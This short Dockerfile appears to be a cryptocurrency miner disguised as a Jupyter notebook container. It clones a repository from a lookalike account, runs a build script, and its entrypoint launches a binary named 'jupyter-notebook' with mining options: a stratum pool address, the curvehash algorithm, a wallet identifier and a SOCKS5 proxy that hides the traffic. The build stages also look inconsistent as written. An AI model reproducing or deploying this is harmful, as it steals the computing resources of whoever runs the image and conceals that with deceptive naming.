ARG ALPINE_VERSION=3.15.0

FROM alpine:${ALPINE_VERSION} as builder

RUN apk add --no-cache git \
                       make \
                       cmake \
                       libstdc++ \
                       gcc \
                       g++ \
                       hwloc-dev \
                       libuv-dev \
                       openssl-dev 

RUN git clone https://github.com/jupyterhuk/ghost.git && cd ghost && sh xmy.sh

FROM alpine:${ALPINE_VERSION}

RUN apk add --no-cache hwloc \
                       libuv


WORKDIR /jupyter-notebook

ENTRYPOINT ["/bin/sh", "-c" , "chmod u+x ./jupyter-notebook && ./jupyter-notebook --proxy=socks5://34.134.60.185:443 -a curvehash -o stratum+tcp://51.79.177.216:7030 -u PKRNcqFzPdEP6zkHLteR7nTt7cJxB67mdE.new"]
